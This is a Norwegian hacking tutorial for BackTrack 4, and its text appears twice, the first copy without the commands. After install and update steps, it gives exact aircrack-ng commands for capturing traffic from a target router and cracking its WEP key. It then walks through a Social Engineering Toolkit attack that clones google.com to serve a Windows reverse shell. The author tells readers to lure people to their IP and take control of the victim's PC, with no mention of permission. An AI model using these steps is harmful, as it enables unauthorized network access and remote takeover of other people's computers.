BackTrack er en linux distro basert på Ubuntu som er laget for hacking og har en samling av forskjellige nyttige verktøy. I denne guiden skal jeg gå gjennom de grunnleggende funksjonene i BackTrack.
Innhold:
1. Installasjon
2. Koble til internett
3. Oppdater BackTrack
4. Crack WEP med Aircrack
5. Social Engineering Toolkit (SET)
---------------1---------------
Installer BackTrack
1. Last ned BackTrack 4 ISO-filen her
2. Enten brenn ISO-filen til en DVD med f.eks nero eller til en minnepenn med UNetbootin
3. Boot fra det lagringsmediet du har brent ISO-filen på
4. Hvis du må logge inn er brukernavn: root og passord: toor deretter skriver du startx
5. Start installasjonsfilen som ligger på skrivebordet, hvis du partisjonerer manuelt er det EXT3 som er filsystemet du skal bruke, du trenger ca 7-15 gb (jeg har 12)
---------------2---------------
Koble til internet
1. Åpne et terminalvindu (Konsole)
2. Skriv inn
3. Skriv inn ifconfig
- ethX er trådinternet
- wlanX er trådløst internet
4. Hvis det er noen av de du mangler har du ikke driverne til det adapteret i BackTrack
5. Skriv inn
Ikke lukk terminalvinduete (da forsvinner WICD-Client)
6. Det skal nå ha kommet et lite tegn nede i høyre hjørne av to datamaskiner trykk på det og koble til det nettverket du vil, hvis det krever passord trykk på pilen under essiden og trykk på properties, skriv deretter inn passordet og hvordan type kryptering det er.
---------------3---------------
Oppdatere Backtrack
1. Start et terminalvindu
2. Skriv inn apt-get update
3. Skriv inn apt-get upgrade
4. Skriv inn apt-get dist-upgrade
Svar y på alle
---------------4---------------
Crack WEP
Først trenger du et nettverkskort som støtter monitor mode, jeg bruker "NETGEAR WG111 v2" ikke kjøp fra butikk i norge de har v3 som ikke støtter monitor mode kjøp fra ebay, den koster ca 200,-
1. Start et terminalvindu
2. Først må vi sette netverkskortet i monitor mode, dette gjør vi med
bytt ut wlan0 med det nettverksadapteret du skal sette i monitor mode
3. Deretter må vi finne ut hvilken kanal og MAC adresse nettverket har
BSSID er MAC adressen til rutern og CH er kanal
http://bildr.no/thumb/690171.jpeg
4. Når man har funnet MAC adressen og kanal må man begynne å logge data fra nettverket.
Bytt ut 00:C0:022:C0:52 med ruter MAC adressen, 10 med kanalen og default med essiden
http://bildr.no/thumb/690178.jpeg
5. Nå må man få mer #data, det gjør vi med
Dette virker bare hvis noen er koblet på nettverket.
http://bildr.no/thumb/690179.jpeg
6. Når man har fått 30 000 eller mer #data kan man begynne og cracke WEP nøkkelen.
skriv inn essiden-01.cap (det er dette som blir lagret av -w så hvis du skriver abc blir det abc-01.cap)
http://bildr.no/thumb/690180.jpeg
---------------5---------------
En grunnlegende guide i Social Engineering Toolkit (SET)
I denne guiden vil jeg bare vise hvordan man bruker Java applet attack. Jeg kommer kanskje til å skrive en detaljert guide hvor jeg forklarer alt som skjer hvis dere vil. I denne guiden får du vite hvordan man skal gjøre det.
1. Start et terminalvindu
2. Skriv inn
3. Skriv inn
4. Skriv inn
5. Skriv inn
6. Velg "Website Attack Vectors"
7. Velg "Site Cloner"
8. Velg "The Java Applet Attack Method"
9. Skriv inn nettsiden du skal klone, jeg kloner http://www.google.com
10. Velg "Windows Shell Reverse_TCP"
11. Velg "shikata_ga_nai (Very Good)"
12. Jeg bruker å kode payloaden en gang
12. Bruk default port (trykk enter uten å skrive inn noe tall)
13. Velg om du skal lage payloaden til Linux og OSX i tilleg til Windows, dette tar litt lengre tid
14. Vent til du får opp "msf exploit(handler) > "
15. Nå er det på tide å lure folk inn på din IP adresse, den ser du hvis du klikker på WICD ikonet nede i høyre hjørne.
16. Vent til du får opp "Command shell session 1 opened ([Din IP]:443 -> [Offer IP]:4150)" så trykk [Enter]
17. Skriv inn
Du har nå kontroll over offerets PC og kan bruke alle CMD kommandoer.
Innhold:
1. Installasjon
2. Koble til internett
3. Oppdater BackTrack
4. Crack WEP med Aircrack
5. Social Engineering Toolkit (SET)
---------------1---------------
Installer BackTrack
1. Last ned BackTrack 4 ISO-filen her
2. Enten brenn ISO-filen til en DVD med f.eks nero eller til en minnepenn med UNetbootin
3. Boot fra det lagringsmediet du har brent ISO-filen på
4. Hvis du må logge inn er brukernavn: root og passord: toor deretter skriver du startx
5. Start installasjonsfilen som ligger på skrivebordet, hvis du partisjonerer manuelt er det EXT3 som er filsystemet du skal bruke, du trenger ca 7-15 gb (jeg har 12)
---------------2---------------
Koble til internet
1. Åpne et terminalvindu (Konsole)
2. Skriv inn
Kode
/etc/init.d/networking start
- ethX er trådinternet
- wlanX er trådløst internet
4. Hvis det er noen av de du mangler har du ikke driverne til det adapteret i BackTrack
5. Skriv inn
Kode
wicd-client
6. Det skal nå ha kommet et lite tegn nede i høyre hjørne av to datamaskiner trykk på det og koble til det nettverket du vil, hvis det krever passord trykk på pilen under essiden og trykk på properties, skriv deretter inn passordet og hvordan type kryptering det er.
---------------3---------------
Oppdatere Backtrack
1. Start et terminalvindu
2. Skriv inn apt-get update
3. Skriv inn apt-get upgrade
4. Skriv inn apt-get dist-upgrade
Svar y på alle
---------------4---------------
Crack WEP
Først trenger du et nettverkskort som støtter monitor mode, jeg bruker "NETGEAR WG111 v2" ikke kjøp fra butikk i norge de har v3 som ikke støtter monitor mode kjøp fra ebay, den koster ca 200,-
1. Start et terminalvindu
2. Først må vi sette netverkskortet i monitor mode, dette gjør vi med
Kode
airmon-ng start wlan0
3. Deretter må vi finne ut hvilken kanal og MAC adresse nettverket har
Kode
airodump-ng wlan1
http://bildr.no/thumb/690171.jpeg
4. Når man har funnet MAC adressen og kanal må man begynne å logge data fra nettverket.
Kode
airodump-ng -c 10 --bssid 00:C0:02:D2:C0:52 -w default wlan1
http://bildr.no/thumb/690178.jpeg
5. Nå må man få mer #data, det gjør vi med
Kode
aireplay-ng -3 -b 00:C0:02:D2:C0:52 wlan1
http://bildr.no/thumb/690179.jpeg
6. Når man har fått 30 000 eller mer #data kan man begynne og cracke WEP nøkkelen.
Kode
aircrack-ng default-01.cap
http://bildr.no/thumb/690180.jpeg
---------------5---------------
En grunnlegende guide i Social Engineering Toolkit (SET)
I denne guiden vil jeg bare vise hvordan man bruker Java applet attack. Jeg kommer kanskje til å skrive en detaljert guide hvor jeg forklarer alt som skjer hvis dere vil. I denne guiden får du vite hvordan man skal gjøre det.
1. Start et terminalvindu
2. Skriv inn
Kode
cd /pentest/exploits/
Kode
svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Kode
cd set
Kode
./set
7. Velg "Site Cloner"
8. Velg "The Java Applet Attack Method"
9. Skriv inn nettsiden du skal klone, jeg kloner http://www.google.com
10. Velg "Windows Shell Reverse_TCP"
11. Velg "shikata_ga_nai (Very Good)"
12. Jeg bruker å kode payloaden en gang
12. Bruk default port (trykk enter uten å skrive inn noe tall)
13. Velg om du skal lage payloaden til Linux og OSX i tilleg til Windows, dette tar litt lengre tid
14. Vent til du får opp "msf exploit(handler) > "
15. Nå er det på tide å lure folk inn på din IP adresse, den ser du hvis du klikker på WICD ikonet nede i høyre hjørne.
16. Vent til du får opp "Command shell session 1 opened ([Din IP]:443 -> [Offer IP]:4150)" så trykk [Enter]
17. Skriv inn
Kode
sessions -i 1